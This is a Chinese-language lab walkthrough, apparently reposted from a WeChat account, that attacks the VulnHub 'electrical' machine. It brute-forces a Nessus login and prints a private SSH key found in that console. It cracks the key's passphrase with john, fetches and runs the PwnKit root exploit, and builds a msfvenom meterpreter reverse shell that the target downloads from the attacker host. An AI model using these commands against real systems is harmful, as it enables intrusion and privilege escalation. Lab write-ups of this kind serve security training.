【渗透测试】digitalworld.local: electrical靶场渗透测试

admin 2025年4月23日01:35:00评论11 views字数 5995阅读19分59秒阅读模式
FOCUS ON US
点击蓝字.关注我们
【渗透测试】digitalworld.local: electrical靶场渗透测试

【渗透测试】digitalworld.local: electrical靶场渗透测试

01
前言
1.1
 下载安装
https://www.vulnhub.com/digitalworldlocal-electrical,747/

选择镜像文件进行下载。下载后解压是一个ovf文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。

【渗透测试】digitalworld.local: electrical靶场渗透测试
1.2
 文件信息
文件名:ELECTRICAL.7z文件大小:12 GBMD5:52A1BA392DAD4E47FAF3AC29C32A624FSHA1:6A0785D226BD311318648129BC53B7E136A5455D
1.3
 注意事项

1.4 靶场目标

获取root权限,共有两个flag。

普通用户:local.txtroot用户:proof.txt
03
渗透测试步骤
3.1
 信息收集

确定IP地址、端口扫描、SMB探测、网站访问、目录扫描、暴力破解。

3.1.1 确定IP地址

使用nmap确定该靶场IP地址,地址为:192.168.241.170。

namp -sP 192.168.241.0/24
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.1.2 端口扫描

使用nmap进行端口扫描,发现其开放22、113、139、445、8834和22222端口

nmap -sV -v -T4 -A -P 192.168.241.170
【渗透测试】digitalworld.local: electrical靶场渗透测试
【渗透测试】digitalworld.local: electrical靶场渗透测试
【渗透测试】digitalworld.local: electrical靶场渗透测试
【渗透测试】digitalworld.local: electrical靶场渗透测试

AI总结一下:

【渗透测试】digitalworld.local: electrical靶场渗透测试
3.1.3 SMB探测

使用enum4linux尝试进行用户枚举,发现两个共享:print$(用于打印驱动)和IPC$(进程间通信服务)。

enum4linux 192.168.241.170
【渗透测试】digitalworld.local: electrical靶场渗透测试

还发现两个用户govindasamy和eletrical。

【渗透测试】digitalworld.local: electrical靶场渗透测试
3.1.4 网站访问

访问8834端口,发现是Nessus扫描器。

https://192.168.241.170:8834
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.1.5 目录扫描

扫描发现多个页面可访问,经过逐一访问并未发现可用信息。

dirsearch -u https://192.168.241.170:8834
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.1.6 目录扫描

既然已经知道用户名,尝试对其进行爆破。

发现账密为:govindasamy/password。

【渗透测试】digitalworld.local: electrical靶场渗透测试
3.2
 漏洞利用

网站登录、发现SSH连接密钥、保存密钥信息、爆破密码、SSH连接进入靶机、查看local.txt文件、查阅本机其他信息、使用linpeash进行监测。

3.2.1 网站登录

使用爆破的用户名和密码登录Nessus。

【渗透测试】digitalworld.local: electrical靶场渗透测试
3.2.2 发现SSH连接密钥

在扫描-认证检查-配置-描述中发现了SSH连接密钥。

【渗透测试】digitalworld.local: electrical靶场渗透测试
【渗透测试】digitalworld.local: electrical靶场渗透测试
【渗透测试】digitalworld.local: electrical靶场渗透测试
Check on electrical servers!Log into "electrical" via SSHWe use the same private-public key pair across the network for convenience.We know you need to troubleshoot the servers sometimes, but do not necessary have the key. Here is the key:-----BEGIN OPENSSH PRIVATE KEY-----b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCN+0u3mqmCbqYwo4vCR1VqAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDbvoOZlrzDvS5ADlguD1jbgAqmXuOrPiS5IEsyN19zuDzYZL9XKcrsvlhzM8J8DdAG69pU/kLBdem/enZWa88B/LCYJWHKs3AnNzA9tsk6tM2PIKVWvoqG+e5DLc3TIb/48Y9MoCUUfpBp1uJJhWNk0r1ph2JWzXfNkUTXozNrwkToIJWlrwgxikfPU328xVNwW/zZdU3Az2TQZYyrcm3D9QT6NNSdml7bjh5ULYg4U6UBm6gwFtWFbcmEiST7ENJPSesyefJqGIL2VoXIsZC4A0ocW2teE/KIPQv+cbP0bKPHFD0B3xze8vhnHwJElE8pywMqgmn9VgPvMvv1+YBrAAAD0MV9eKrECZivMrABDFavCx4vvIAJOoB6EupNKtBOG310CQX0yp7DXbodZxMQf45CT6U7gh3R10igfmpAlUzabszxm91LTct9Ji/3YiQZHzEDF5wPvVzYOm2b4LYuRlSaOQ8hS1bNuxaWZRSyMA/MEr6GhhKoF1BtcbVGA7SMW4M6csx1KHRmaHhkd7XQl7UDxPglpyhVml5uWLLOv2zIx9XzgP6MXkXOKQk0A5lSbsQSP2b6HD2khc82kPLqzRZLyCw0+qv6QGL/M5wHQh13YVqQxYEYVFFKrw93fq5Ue9et/Pi0bhxOU8kmZOydYi4N4tq0GF3576DSJcACzUOaq84GxToBs0QOfamjA0JySip8fhH5hh1xTpoY9UIRyaoxqsak6x+CdRNoJJ3TipCo0S4u9fuWBRBC3lraX5FX/7VDnxOOhYtnoswke4KaMFM/IM0c6M91V3680OWWjrZBgjQse8tD2TP4/5PphMnCPlW2kTho99yEW7luDYOJBzbMo36VeE1fHzV0V+vfK5lwzom1Je0uwW+M8GC9J1PI+PLPgu0kFB73qi1A1PbznSoO8Np9W3+SvczxgZTp9mYNwY5UBIQVHEoHz9buiIRr5qaZYIqLcIX4RaWUAWhkeoMpnvWywNkc2m3Dej5y6vxD8VQ2o1hXcDL9DfjGGFVaT6ZvY2zRGX7m09IHbJkY9ZpGdAE4kR+AdcGLtv2S0FDHiJtXUiGLDrae6ALhUAAemZ51JOnKf8lhfC2O5nMN8VMV2Os7gPnjvz690COLVoj+Q40EwYTMP9B/Syk0KTLxB735eUCMmWDITdQRdGCRCXnnAxvdv/ARK5Avm7ujRp2u+T9mxuSk1d4Kp4Xaid6ymiTKbdAL9OuTGlGwyv23HVbnnOe3MJcDFBmNbDGCyAgQvfdG2cOrjk+4v+OUgAhJxYcR8UYKY+yLtt3bkZHZCYsEuRCmeovbBglAO1bdZoUD3IFdUmKF/VLhEK9Bi5np4zXfIodED2NWJYQEO++nPdmkPEf5reXRwVivL70sg2npED5LUCLlcUVztovjilIT3arJ9VBsT7QWyWow1dDTwibjUsnYftacrUbBjQH9b1sJGAtx1bmLMmwmqOVXkVv5RZ4vLXslKbgkO27r3UKjtOq/2Y0Kz54nFQ1ptoeh933ROjwOGoK48xwkG2oiuPpkkaEvv7b9W5hXMAy0huF9kuP5SIWHu8CNjD9GF/wV8NomDrl84BEU30Omd+RRX/kyNWWThhADa/z5o3pK9E9G9Jgp7VMUK7uEHXFBbIfttPJJOVk=-----END OPENSSH PRIVATE KEY-----

在登录信息中发现登录的用户名为electrical。

【渗透测试】digitalworld.local: electrical靶场渗透测试
3.2.3 保存密钥信息

将获得到的连接密钥保存到OpenSSH.txt文件中。

【渗透测试】digitalworld.local: electrical靶场渗透测试
3.2.4 爆破密码

使用ssh2john转化为SSH密钥为john可以破解的格式。

ssh2john OpenSSH.txt > OpenSSH-JM.txt

使用john破解,得到electrical用户的密码为electrical。没想到用户名和密码相同……

john --wordlist=/usr/share/wordlists/rockyou.txt OpenSSH-Jm.txt
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.2.5 SSH连接进入靶机

连接失败,原因:未给私钥权限。

【渗透测试】digitalworld.local: electrical靶场渗透测试

重新起一个靶机重新进行以上操作。新靶机IP地址是192.168.241.171。

vim ia_Opensshchmod 600 ia_Opensshssh2john ia_Openssh > 123.txt
【渗透测试】digitalworld.local: electrical靶场渗透测试
ssh electrical@192.168.241.171 -p 22222 -i ia_Openssh
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.2.6 查看local.txt文件
lscat local.txt
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.2.7 查阅本机其他信息

查看本机有哪些用户。

ls -al /home
【渗透测试】digitalworld.local: electrical靶场渗透测试

查看本机网络连接情况。

netstat -antulp
【渗透测试】digitalworld.local: electrical靶场渗透测试

查看系统进程信息。

top
【渗透测试】digitalworld.local: electrical靶场渗透测试

查看具有SUID权限的文件。

find / -perm -u=s -type f 2>/dev/null
【渗透测试】digitalworld.local: electrical靶场渗透测试

查看内核版本及系统版本。

uname -auname -rcat /etc/issuecat /etc/*release
【渗透测试】digitalworld.local: electrical靶场渗透测试

查看定时任务。

cat /etc/crontab
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.2.8 使用linpeash进行监测
linpeaspython3 -m http.server 9876
【渗透测试】digitalworld.local: electrical靶场渗透测试
wget http://192.168.241.138:9876/linpeas.sh
【渗透测试】digitalworld.local: electrical靶场渗透测试

执行失败,添加可执行权限。

chmod +x linpeas.shls -l linpeas.sh./linpeas.sh
【渗透测试】digitalworld.local: electrical靶场渗透测试
【渗透测试】digitalworld.local: electrical靶场渗透测试

经过一圈检测,并未发现可利用条件。

3.3
 权限提升1-方法1使用编译文件直接提权

网络查阅后,可采用CVE-2021-4034(PwnKit)漏洞。

下载编译文件,执行文件,获得flag。

3.3.1 下载编译文件
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKitwget http://192.168.241.138:9876/PwnKit
【渗透测试】digitalworld.local: electrical靶场渗透测试
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.3.2 执行文件
chmod +x PwnKit./PwnKitidwhoami
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.3.3 获得flag
cd ~cat proof.txt
【渗透测试】digitalworld.local: electrical靶场渗透测试

恭喜您获得这台机器的root shell!

【渗透测试】digitalworld.local: electrical靶场渗透测试
3.4 权限提升2-方法2使用MSF

反弹shell生成命令,MSF生成脚本文件,靶机下载该脚本文件,开启监听执行脚本,使用suggester模块提权,提权成功。

3.4.1 反弹shell生成命令
网址:https://forum.ywhack.com/reverse-shell/生成shell脚本:msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.241.138 LPORT=10002 -f elf -o reverse.elf生成主机监听命令:msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost 192.168.241.138; set lport 10002; exploit"
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.4.2 MSF生成脚本文件

在MSF中依次运行以下命令。

msfconsolemsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.241.138 LPORT=10002 -f elf -o reverse.elf 

生成reverse.elf文件。

【渗透测试】digitalworld.local: electrical靶场渗透测试
3.4.3 靶机下载该脚本文件

开启临时http服务。

python3 -m http.server 9876
【渗透测试】digitalworld.local: electrical靶场渗透测试

在靶机中下载该文件。

wget http://192.168.241.138:9876/reverse.elf
【渗透测试】digitalworld.local: electrical靶场渗透测试

授予可执行权限。

ls -ll reverse.elfchmod +x reverse.elfls -ll reverse.elf
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.4.4 开启监听,执行脚本

攻击机开启监听,随后在靶机中执行上传的revers.elf文件。

攻击机执行:msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost 192.168.241.138; set lport 10002; exploit"靶机执行:./reverse.elf

成功将shell反弹至MSF。

【渗透测试】digitalworld.local: electrical靶场渗透测试

后台挂起session。

bg
【渗透测试】digitalworld.local: electrical靶场渗透测试
3.4.5 使用suggester模块提权
search sugg
【渗透测试】digitalworld.local: electrical靶场渗透测试
use 1set session 1run
【渗透测试】digitalworld.local: electrical靶场渗透测试

共展示可以利用以下漏洞进行提权。

【渗透测试】digitalworld.local: electrical靶场渗透测试

经过多次尝试,最后选择使用CVE-2021-4034漏洞。

【渗透测试】digitalworld.local: electrical靶场渗透测试
3.4.6 提权成功
shelllscd ~cat proof.txtid
【渗透测试】digitalworld.local: electrical靶场渗透测试
【渗透测试】digitalworld.local: electrical靶场渗透测试
【渗透测试】digitalworld.local: electrical靶场渗透测试
(
END
)

免责声明

本公众号“暗魂攻防实验室”致力于分享网络安全相关知识及资讯,所有内容仅供学习和交流使用,不得用于任何非法用途。由于传播、利用本公众号“暗魂攻防实验室”所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任!!!

以下为本公众号声明内容,请知悉并遵守:

1.关于信息的准确性

本公众号所发布的信息均来源于公开渠道或作者整理,仅供参考,不保证内容的绝对准确性、完整性和时效性。使用者在依赖相关内容前,应独立核实信息的真实性和适用性。

2.法律与合规性

使用者应严格遵守国家相关法律法规,确保所有操作仅用于合法用途。本公众号明确禁止任何利用内容进行非法活动的行为,由此产生的后果由使用者自行承担,本公众号及作者不承担任何责任。

3.版权声明

本公众号部分内容如引用了他人作品或资源,均已标注来源或作者。如有侵权,请及时联系我们,我们将在核实后立即删除并致以歉意。

4.合法用途限制

本公众号内容仅供参考,任何利用本公众号内容从事违法行为的后果均由使用者自行承担,本公众号及作者对此不承担任何责任。

5.风险告知

因使用或传播本公众号内容导致的直接或间接后果(如系统损坏、数据丢失、法律责任等),均由使用者自行承担。本公众号及作者对此不承担任何责任。

【渗透测试】digitalworld.local: electrical靶场渗透测试
FINANCE
扫码联系
暗魂攻防实验室
官方客服
往期推荐:

配置不当导致某程序成为服务器“后门”?你的数据可能已暴露

【渗透测试】ICA: 1靶场渗透测试

【渗透测试】Thales靶场渗透测试

【渗透测试】Empire-Lupin-One靶场渗透测试

【渗透测试】digitalworld.local: electrical靶场渗透测试

原文始发于微信公众号(暗魂攻防实验室):【渗透测试】digitalworld.local: electrical靶场渗透测试

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月23日01:35:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透测试】digitalworld.local: electrical靶场渗透测试https://cn-sec.com/archives/3968648.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息